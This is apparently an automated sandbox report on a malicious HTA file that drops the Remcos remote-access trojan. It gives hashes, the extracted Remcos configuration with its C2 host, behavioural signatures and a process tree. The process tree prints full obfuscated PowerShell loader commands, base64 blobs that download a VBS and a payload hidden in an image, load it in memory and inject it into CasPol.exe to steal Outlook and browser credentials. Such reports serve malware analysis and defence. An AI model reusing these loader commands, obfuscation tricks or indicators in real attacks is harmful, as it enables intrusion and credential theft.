Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16/12/2024, 06:16
Behavioral task
behavioral1
Sample
clearentirethingwithbestnoticetheeverythinggooodfrome.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
clearentirethingwithbestnoticetheeverythinggooodfrome.hta
Resource
win10v2004-20241007-en
General
-
Target
clearentirethingwithbestnoticetheeverythinggooodfrome.hta
-
Size
144KB
-
MD5
5215d83b478d7a718062863c5efbbeeb
-
SHA1
9ac735295a8b3bc10740d50669f6fa5c81ae10ce
-
SHA256
af6c6b710e9a4c5e2d8b53642779548a4edcd528cd7e5714c6ac9d69f38efb80
-
SHA512
b1ea72019653fa7858aa1b6ad1fa3fcf6974ade703be0edd55f891030706fc675425e5f1372dc3a61671dff5e40e6baceba019af60711cd65a248f7cecbca915
-
SSDEEP
768:t1EZFxaTOum2oum2M5KUJDVUKhCbGVf/AMF9woN83WkkA7MhrkK0IHj66666666l:tg
Malware Config
Extracted
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20
Extracted
remcos
RemoteHost
kelexrmcadmnnccupdated.duckdns.org:14646
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-B3IX49
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 2 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/4388-100-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/1468-101-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/1468-101-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 3 IoCs
flow pid Process 13 2212 powershell.exe 19 516 powershell.exe 28 516 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 3668 cmd.exe 2212 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CasPol.exe -
pid Process 516 powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 516 set thread context of 100 516 powershell.exe 104 PID 100 set thread context of 1468 100 CasPol.exe 106 PID 100 set thread context of 1888 100 CasPol.exe 107 PID 100 set thread context of 4388 100 CasPol.exe 108 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2212 powershell.exe 2212 powershell.exe 516 powershell.exe 516 powershell.exe 516 powershell.exe 516 powershell.exe 4388 CasPol.exe 4388 CasPol.exe 1468 CasPol.exe 1468 CasPol.exe 1468 CasPol.exe 1468 CasPol.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 100 CasPol.exe 100 CasPol.exe 100 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2212 powershell.exe Token: SeDebugPrivilege 516 powershell.exe Token: SeDebugPrivilege 4388 CasPol.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 3456 wrote to memory of 3668 3456 mshta.exe 83 PID 3456 wrote to memory of 3668 3456 mshta.exe 83 PID 3456 wrote to memory of 3668 3456 mshta.exe 83 PID 3668 wrote to memory of 2212 3668 cmd.exe 85 PID 3668 wrote to memory of 2212 3668 cmd.exe 85 PID 3668 wrote to memory of 2212 3668 cmd.exe 85 PID 2212 wrote to memory of 2256 2212 powershell.exe 86 PID 2212 wrote to memory of 2256 2212 powershell.exe 86 PID 2212 wrote to memory of 2256 2212 powershell.exe 86 PID 2256 wrote to memory of 460 2256 csc.exe 87 PID 2256 wrote to memory of 460 2256 csc.exe 87 PID 2256 wrote to memory of 460 2256 csc.exe 87 PID 2212 wrote to memory of 3416 2212 powershell.exe 94 PID 2212 wrote to memory of 3416 2212 powershell.exe 94 PID 2212 wrote to memory of 3416 2212 powershell.exe 94 PID 3416 wrote to memory of 516 3416 WScript.exe 95 PID 3416 wrote to memory of 516 3416 WScript.exe 95 PID 3416 wrote to memory of 516 3416 WScript.exe 95 PID 516 wrote to memory of 1860 516 powershell.exe 103 PID 516 wrote to memory of 1860 516 powershell.exe 103 PID 516 wrote to memory of 1860 516 powershell.exe 103 PID 516 wrote to memory of 100 516 powershell.exe 104 PID 516 wrote to memory of 100 516 powershell.exe 104 PID 516 wrote to memory of 100 516 powershell.exe 104 PID 516 wrote to memory of 100 516 powershell.exe 104 PID 516 wrote to memory of 100 516 powershell.exe 104 PID 516 wrote to memory of 100 516 powershell.exe 104 PID 516 wrote to memory of 100 516 powershell.exe 104 PID 516 wrote to memory of 100 516 powershell.exe 104 PID 516 wrote to memory of 100 516 powershell.exe 104 PID 516 wrote to memory of 100 516 powershell.exe 104 PID 100 wrote to memory of 1468 100 CasPol.exe 106 PID 100 wrote to memory of 1468 100 CasPol.exe 106 PID 100 wrote to memory of 1468 100 CasPol.exe 106 PID 100 wrote to memory of 1468 100 CasPol.exe 106 PID 100 wrote to memory of 1888 100 CasPol.exe 107 PID 100 wrote to memory of 1888 100 CasPol.exe 107 PID 100 wrote to memory of 1888 100 CasPol.exe 107 PID 100 wrote to memory of 1888 100 CasPol.exe 107 PID 100 wrote to memory of 4388 100 CasPol.exe 108 PID 100 wrote to memory of 4388 100 CasPol.exe 108 PID 100 wrote to memory of 4388 100 CasPol.exe 108 PID 100 wrote to memory of 4388 100 CasPol.exe 108
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\clearentirethingwithbestnoticetheeverythinggooodfrome.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kkaveuq3\kkaveuq3.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB18D.tmp" "c:\Users\Admin\AppData\Local\Temp\kkaveuq3\CSC37B425BA3BE412D84F0FF6FAD129D.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:460
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHVuYmlvdHVyYmF0ZWQuSW52b2tlKCRudWxsLCBAKCcwLzFEYkJwL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckYmFja3NjYXR0ZXJpbmdzJywgJyRiYWNrc2NhdHRlcmluZ3MnLCAnJGJhY2tzY2F0dGVyaW5ncycsICdDYXNQb2wnLCAnJGJhY2tzY2F0dGVyaW5ncycsICckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCcxJywnJGJhY2tzY2F0dGVyaW5ncycsJycpKTs=';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵PID:1860
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:100 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\poutjkmzsfufhshgdnkxf"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1468
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\aqzmkdxtgnmssyvkmywziifc"7⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:1888
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\kkfelvquuwexunrovijstvatpca"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4388
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
19KB
MD56c0c4121d0b8a69014368f0cb48b769d
SHA13a037e85ea9295e22a8d28d686c6dd247a6905a1
SHA256764ec3c49083fafbde02da2e8b13cdf02fda8319e1a33662344b607c82aea726
SHA5122b7b0558b80230ec3864ef0de1598fb1d6e140e51a9e889dcfad8f1126f95f1c87dfb152c2f177e2f606959eaa65bf5eed6e2db4cfdce199c2ae133d9b982665
-
Filesize
1KB
MD57150b05de963e7973101652be719d6cc
SHA1bb66f22d7f931fd33377f81003ba1c48ade75394
SHA2568516e40cdb8cb2afa251669770a093ee6f50e4620e381f724247d175916138e7
SHA512cb9db94d009b30f8b1e349ff033fbfe73f3c75b77b81527b3912c998f09b680fb8aed897aab24abb5014e088e843bf859ca942f02cdf94006d7e7414845bd848
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD554ef4e1bf3bb31c87b179361c17e1189
SHA1864170d0592a4439833307ad76b916b68c9c9e23
SHA256f9309a0950adc1829061227f3dd9373e65f9795471b6ccd4f8193127770c6f5c
SHA5127a425d50931609a3f5fc6f27fb239a0158cd9e0f334e28bb7a013fcd36a1770bd9b365999281cbc996f091d6bd8c2ab2ed5511f446099390f06c7fc19d0f0b29
-
Filesize
4KB
MD517eece3240d08aa4811cf1007cfe2585
SHA16c10329f61455d1c96e041b6f89ee6260af3bd0f
SHA2567cc0db44c7b23e4894fe11f0d8d84b2a82ad667eb1e3504192f3ba729f9a7903
SHA512a7de8d6322410ec89f76c70a7159645e8913774f38b84aafeeeb9f90dc3b9aa74a0a280d0bb6674790c04a8ff2d059327f02ebfda6c4486778d53b7fc6da6370
-
Filesize
150KB
MD52e124153be958647e84566b305ecf94e
SHA1d7d06fe6314ee8e4c31a971872632477ede38248
SHA2565b5835cebcc79ae42d3edc11ddca5e2f6c4bf333e78d1b2d0733a091a9fd887e
SHA5129bb7f048cfa817e406d63affc034ea89f7beb6dd584521d5b1a531a032e22470bb9e9c8a12931b5838a77267acf5fe64e8e788caee49c014348b75925614e450
-
Filesize
652B
MD52cc0fbaa3751e5581fc5bbf7e1161f5b
SHA12f0de46c0604ea15b4e27d3e97776ad28aca6327
SHA25687240859965508e56169eb3642601cf83f9641f46aa32a5a7837122acc145bdf
SHA512177b99bc903761519ae4c6dfb43d241513552b08cfee89f6c9f0a9f75b10500545da3a77c1ac1ba696b0fbd1fa2013fd3e909b0943445b7828dd2f168b1368f0
-
Filesize
475B
MD50c431e10cf228fe2c475697b04ff0ebb
SHA104439e5d97e5c2e03f57caf24564925b32d644cb
SHA256f0514c83d3a0460e90e267fbb96546f4b5890906eb7ea94799c38ec743fb91ae
SHA512954a57476daa5408f0ff679972741e63e8fe61ff20bdefc40b83ad6ff633b0a7d5d3ddce7cfaff0a5ff0bc2300704f6c5639adbf44f38a818d22644814e5efcb
-
Filesize
369B
MD55b79cb1cb49d53dcf6c99c24340a489d
SHA1088c8a480c400bb5bd8146bc11ff0e8b78be8d1c
SHA2569685555e4f080b675dd44f7536389d74fed9a7399fb9b483e698f474321f4234
SHA512db3868a41d41c69cb1e91346008e8af249f478cf74579a13c31e93bef40eb840d20f16c948a6dc99abbeb5f750f0d3c0a551fd81b3de6db4e3447418dba5f0cb